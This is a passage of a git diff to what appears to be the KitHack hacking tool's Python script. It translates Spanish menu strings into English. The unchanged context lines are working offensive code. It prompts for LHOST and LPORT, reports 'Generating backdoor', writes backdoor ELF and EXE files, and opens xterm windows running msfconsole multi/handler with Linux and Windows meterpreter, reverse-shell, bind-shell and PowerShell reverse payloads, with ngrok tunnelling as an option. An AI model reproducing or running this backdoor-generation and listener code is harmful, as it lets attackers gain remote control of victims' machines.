linux/x86/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1110,7 +1100,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1118,24 +1108,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1143,7 +1133,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1151,24 +1141,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_bind_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1176,7 +1166,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1184,31 +1174,31 @@ def main(): location = os.getcwd() if os.stat('output/{}.elf'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.elf".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD linux/x86/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("\n{}[X] OPCION INVALIDA\n".format(RED)) + print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('clear') main() @@ -1236,7 +1226,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1244,24 +1234,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1269,7 +1259,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1277,24 +1267,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1302,7 +1292,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1310,24 +1300,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1335,7 +1325,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1343,24 +1333,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1368,7 +1358,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1376,24 +1366,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/powershell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1401,7 +1391,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1409,24 +1399,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/x64/shell_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1434,7 +1424,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1442,24 +1432,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_http; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1467,7 +1457,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1475,24 +1465,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_https; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1500,7 +1490,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1508,24 +1498,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter_reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1533,7 +1523,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input("\n{0}Ingrese un nombre para su archivo de salida: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) @@ -1541,24 +1531,24 @@ def main(): location = os.getcwd() if os.stat('output/{}.exe'.format(mainout)).st_size != 0: print("\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.exe".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] ¿Desea ejecutar msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": + if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": os.system('systemctl stop postgresql && clear') main() else: if not ".tcp.ngrok.io" in LHOST: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"'.format(LHOST, LPORT)) - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD windows/meterpreter/reverse_tcp; exploit\'"') - pause("\n{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("\n{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() else: - print("{}[X] ERROR AL GENERAR SU BACKDOOR\n".format(RED)) + print("{}[X] An error has occured whilst generating the backdoor\n".format(RED)) time.sleep(3) - pause("{}Presione cualquier tecla para continuar...".format(GREEN)) + pause("{}Press any key to continue...".format(GREEN)) os.system('systemctl stop postgresql && clear') main() @@ -1566,7 +1556,7 @@ def main(): run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) 